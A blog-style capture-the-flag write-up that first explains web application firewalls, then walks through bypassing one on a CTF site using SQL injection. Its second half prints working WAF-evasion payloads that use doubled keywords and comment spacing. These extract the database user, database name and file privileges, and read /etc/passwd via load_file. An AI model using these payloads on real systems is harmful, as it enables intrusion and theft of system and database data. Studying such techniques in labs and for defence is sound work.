SQL Injection / WAF Bypassing

Default Diagram of Web Application Communication

A WAF or web application firewall using for protect web servers and filtering/monitoring HTTP traffic from attack queries such as cross-site forgery, cross-site scripting (XSS), SQL Injection, file inclusion among others. as well as its OSI model 7 layer stuff.

A WAF operates through a set of rules often called policies. These policies aim to protect against vulnerabilities in the application by filtering out malicious traffic. The value of a WAF comes in part from the speed and ease with which policy modification can be implemented, allowing for faster response to varying attack vectors; during a DDoS attack, rate limiting can be quickly implemented by modifying WAF policies.

What is the difference between blacklist and whitelist WAFs?

A WAF can be implemented one of three different ways, each with it’s own benefits and shortcomings:

• A network-based WAF is generally hardware-based. Since they are installed locally they minimize latency, but network-based WAFs are the most expensive option and also require the storage and maintenance of physical equipment.
• A host-based WAF may be fully integrated into an application’s software. This solution is less expensive than a network-based WAF and offers more customizability. The downside of a host-based WAF is the consumption of local server resources, implementation complexity, and maintenance costs. These components typically require engineering time, and may be costly.
• Cloud-based WAFs offer an affordable option that is very easy to implement; they usually offer a turnkey installation that is as simple as a change in DNS to redirect traffic. Cloud-based WAFs also have a minimal upfront cost, as users pay monthly or annually for security as a service. Cloud-based WAFs can also offer a solution that is consistently updated to protect against the newest threats without any additional work or cost on the user’s end. The drawback of a cloud-based WAF is that users hand over the responsibility to a third-party, therefore some features of the WAF may be a black box to them. Learn about Cloudflare’s cloud-based WAF solution.

Today discussion about a technique bypassing WAF from SQL Injection && Demonstrate CTF site.

Few days earlier I was joined CTF challange called OMEGA handle by Osanda Malith Jayathissa and after some research we found website using WAF security mechanism and we have to bypass this for go further.

first we moved to robots.txt file in site and in there we found some DIRs. after going though it we found interesting DIR called /dev/ usually it doing search members

/dev/ DIR

And after tried to inject SQL queries their.

SQL Injection Detection

With this we figure out there using some security mechanism. check for more we use some more SQL queries but all queries was blacklisted by WAF. So we created custom payload thanks to Osanda Malith Jayathissa. and Bypass WAF using custom payload:-

damn’UnIUNIONon/**/sESELECTlect/**/1,2,user(),4&&1=’1

Payload Worked! :)

Now we need to find database().

damn’UnIUNIONon/**/sESELECTlect/**/1,2,database(),4&&1=’1

database(); :)

If go furthermore we just figure out user privileges that had been granted for default user of this database.

damn’UnIUNIONon/**/sESELECTlect/**/1,2,File_priv,4/**/from/**/mysql.user/**/where/**/user=user()||1=’1

Fille Privileges :)

Now we tryed to read /etc/passwd file using this privileges.

damn’UnIUNIONon/**/sESELECTlect/**/1,2,load_file(‘/etc/passwd’),4||1=’1

/etc/passwd :)